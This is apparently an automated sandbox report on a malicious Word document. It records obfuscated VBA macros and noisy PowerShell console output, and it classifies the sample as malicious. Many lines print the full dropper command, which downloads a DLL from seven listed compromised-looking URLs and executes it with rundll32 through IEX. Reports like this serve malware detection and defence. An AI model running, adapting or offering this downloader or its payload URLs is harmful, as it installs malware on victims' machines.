Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....h.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............:T.k......T...............7.............}..v............0.b.....................~.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............ZU.k....h.................7.............}..v............0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....$......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....%................7.............}..v....0&......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v.....,......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....-................7.............}..v....0.......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(3................7.............}..v.....3......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....p:......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k....(;................7.............}..v.....;......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......?......0.b.............H.T.....4.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....@................7.............}..v.....A......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................:T.k......T...............7.............}..v....PF......0.b.....................l.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....G................7.............}..v.....G......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......:T.k......T...............7.............}..v.....K......0.b.............H.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................ZU.k.....K................7.............}..v....PL......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....H.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v....h.......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.... .................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.4.9.............}..v............0.b...............T.....$.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................l.k......T...............7.............}..v............0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................m.k....h.................7.............}..v............0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.......t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .<.<.<.<. . .$.d.f.k.j.....0.b...............T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................m.k......................7.............}..v....`.......0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v....(%......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.....%................7.............}..v....`&......0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .t.e.r.B.i.n.d.i.n.g.E.x.c.e.p.t.i.o.n.....}..v.....*......0.b...............T.....,.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....8+................7.............}..v.....+......0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................l.k......T...............7.............}..v.....2......0.b.............................(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....83................7.............}..v.....3......0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .n.d.s...I.n.v.o.k.e.E.x.p.r.e.s.s.i.o.n.C.o.m.m.a.n.d.....0.b...............T.....<.......(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k.....8................7.............}..v....09......0.b.............h.T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........l.k......T...............7.............}..v.....<......0.b...............T.............(...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................m.k....x=................7.............}..v.....=......0.b.............h.T.............(...............Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$704.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE407.tmpJump to behavior
Source: classification engineClassification label: mal92.expl.evad.winDOC@5/13@0/0
Source: 704.docOLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: ~DF59F33552EDE7EF7C.TMP.0.drStream path 'VBA/cvbku3gakuisdgfilu3gblaw' : High number of string operations
Obfuscated command line foundShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Suspicious powershell command line foundShow sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
